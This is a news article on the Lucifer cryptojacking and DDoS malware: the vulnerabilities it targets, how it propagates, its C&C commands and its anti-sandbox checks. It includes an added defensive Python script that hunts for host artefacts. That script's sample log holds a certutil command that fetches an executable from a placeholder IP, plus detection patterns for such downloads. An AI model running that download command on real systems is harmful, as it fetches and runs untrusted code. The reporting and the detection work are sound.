
Hybrid Malware ‘Lucifer’ Includes Cryptojacking, DDoS Capabilities

A recently identified piece of cryptojacking malware includes functionality that enables its operators to launch distributed denial of service (DDoS) attacks, Palo Alto Networks reports.


Dubbed Lucifer, the malware was first observed on May 29, as part of a campaign that is still ongoing, but which switched to an upgraded variant on June 11.

The threat drops XMRig to mine Monero, propagates on its own by exploiting a range of known vulnerabilities, supports command and control (C&C) operations, and drops and runs the EternalBlue and EternalRomance exploits together with the DoublePulsar backdoor against vulnerable hosts to spread across the local network.

Lucifer, Palo Alto Networks security researchers reveal, targets a long list of critical and high-severity vulnerabilities in software such as Rejetto HTTP File Server, Jenkins, Oracle WebLogic, Drupal, Apache Struts, Laravel, PHPStudy and Windows.

The targeted flaws are CVE-2014-6287, CVE-2018-1000861, CVE-2017-10271, CVE-2018-20062, CVE-2018-7600, CVE-2017-9791, CVE-2019-9081, the PHPStudy backdoor RCE, CVE-2017-0144, CVE-2017-0145, and CVE-2017-8464.

Successful exploitation of these bugs provides attackers with the ability to execute code on the target machines. Although software updates to address these issues have been available for some time, many systems remain unpatched and exposed to attacks.

The malware carries three resource sections, each holding a binary for a specific purpose: UPX-packed x86 and x64 builds of XMRig 5.5.0, and the Equation Group tooling (the EternalBlue and EternalRomance exploits and the DoublePulsar backdoor implant).

Once it has infected a machine, Lucifer establishes persistence by setting specific registry key values. It then grants itself debug privilege (SeDebugPrivilege) and begins operation by launching several worker threads.


For propagation, the malware scans for open TCP ports 135 (RPC) and 1433 (MSSQL) and tries to log in with commonly used credentials, fires the Equation Group exploits at reachable hosts, or sends HTTP requests to probe for exposed systems running the vulnerable web applications listed above. The payload delivered to a vulnerable system fetches a copy of the malware with the built-in Windows certutil utility, a living-off-the-land download technique that leaves a recognizable command line on the victim.

After all worker threads are launched, the malware enters an infinite loop to handle C&C operation. Based on commands received from the server, it can launch TCP/UDP/HTTP DoS attacks, download and execute files, execute commands, enable/disable the miner’s status report functionality, enable flags related to the miner, or reset the flags and terminate the miner.

The Stratum protocol on port 10001 is used for communication between the cryptojacking bot and its mining server.
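The propagation and mining behaviour described above leaves three host-level artefacts a defender can hunt for: certutil invoked as a downloader, a burst of connections to TCP 135/1433 across many internal hosts from one process, and outbound traffic to the Stratum port 10001. The following Python is an added example written for this page (editor's code, not Palo Alto Networks' analysis tooling or anything from the malware itself). It runs over a constructed, simplified process-creation and network-connection log; the `kind|host|field=value;...` format, the field names and the scan threshold of four distinct targets are assumptions, and port 10001 on its own is a weak signal that should be confirmed by inspecting the traffic.

```python
"""Hunt for Lucifer-style host artefacts in a simplified event log.

Example code added by the editor. The log format below is constructed for
the example and is not a real Sysmon or EDR schema.
"""
import re
from collections import defaultdict

# Constructed sample events. Format (assumed): kind|host|field=value;field=value
# ws01 shows all three behaviours; ws02 and ws03 are benign noise.
SAMPLE_LOG = r"""
proc|ws01|image=C:\Windows\System32\certutil.exe;cmdline=certutil -urlcache -split -f http://203.0.113.7/x.exe C:\Users\Public\x.exe
proc|ws01|image=C:\Windows\System32\certutil.exe;cmdline=certutil -store My
net|ws01|image=C:\Users\Public\x.exe;dst=198.51.100.9;dport=10001;proto=tcp
net|ws01|image=C:\Users\Public\x.exe;dst=10.0.0.11;dport=1433;proto=tcp
net|ws01|image=C:\Users\Public\x.exe;dst=10.0.0.12;dport=1433;proto=tcp
net|ws01|image=C:\Users\Public\x.exe;dst=10.0.0.13;dport=1433;proto=tcp
net|ws01|image=C:\Users\Public\x.exe;dst=10.0.0.14;dport=135;proto=tcp
net|ws02|image=C:\Program Files\Mozilla Firefox\firefox.exe;dst=93.184.216.34;dport=443;proto=tcp
net|ws03|image=C:\Windows\System32\svchost.exe;dst=10.0.0.5;dport=135;proto=tcp
"""

# certutil's cache-download form is "certutil -urlcache [-split] -f <url> <file>";
# the legitimate "-store", "-verify" etc. uses never carry a URL.
CERTUTIL_DOWNLOAD = re.compile(r"-urlcache\b.*\bhttps?://", re.IGNORECASE)
STRATUM_PORT = 10001        # bot -> mining server port named in the write-up
SCAN_PORTS = {135, 1433}    # RPC and MSSQL, the ports Lucifer probes
SCAN_THRESHOLD = 4          # distinct targets before we call it scanning (assumed)


def parse(line):
    """Split one 'kind|host|k=v;k=v' line into a flat dict."""
    kind, host, rest = line.split("|", 2)
    fields = dict(kv.split("=", 1) for kv in rest.split(";"))
    fields.update(kind=kind, host=host)
    return fields


def detect(log_text):
    """Return a list of (host, rule, detail) alerts found in the log."""
    alerts = []
    scan_targets = defaultdict(set)   # (host, image) -> distinct dsts on 135/1433
    for line in log_text.strip().splitlines():
        ev = parse(line)
        if ev["kind"] == "proc":
            image = ev["image"].rsplit("\\", 1)[-1].lower()
            if image == "certutil.exe" and CERTUTIL_DOWNLOAD.search(ev["cmdline"]):
                alerts.append((ev["host"], "certutil_download", ev["cmdline"]))
        elif ev["kind"] == "net":
            dport = int(ev["dport"])
            if dport == STRATUM_PORT:
                detail = f'{ev["image"]} -> {ev["dst"]}:{dport}'
                alerts.append((ev["host"], "stratum_port", detail))
            elif dport in SCAN_PORTS:
                scan_targets[(ev["host"], ev["image"])].add(ev["dst"])
    # One process touching many hosts on RPC/MSSQL looks like the worm's sweep,
    # while a single svchost -> 135 connection (ws03) is normal Windows traffic.
    for (host, image), dsts in scan_targets.items():
        if len(dsts) >= SCAN_THRESHOLD:
            alerts.append((host, "rpc_mssql_scan", f"{image} -> {len(dsts)} hosts"))
    return alerts


if __name__ == "__main__":
    for host, rule, detail in detect(SAMPLE_LOG):
        print(f"{host}\t{rule}\t{detail}")
```

The certutil rule keys on the URL rather than on the binary alone, because certutil runs constantly for legitimate certificate work; the scan rule counts distinct destinations per process so that a domain controller's normal RPC chatter to a single peer does not fire. Both rules are behavioural and survive a repacked sample, unlike a hash of the dropped XMRig build.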

The upgraded version of the malware has the same capabilities and behavior as its predecessor, but adds an anti-sandbox check: it compares the username and computer name of the infected host against a predefined list, and looks for specific device drivers, DLLs and virtual devices associated with analysis environments, halting if it finds a match. It also includes anti-debugger capabilities.

“Lucifer is a new hybrid of cryptojacking and DDoS malware variant that leverages old vulnerabilities to spread and perform malicious activities on Windows platforms. Applying the updates and patches to the affected software [is] strongly advised,” Palo Alto Networks concludes.


Written By

Ionut Arghire is an international correspondent for SecurityWeek.
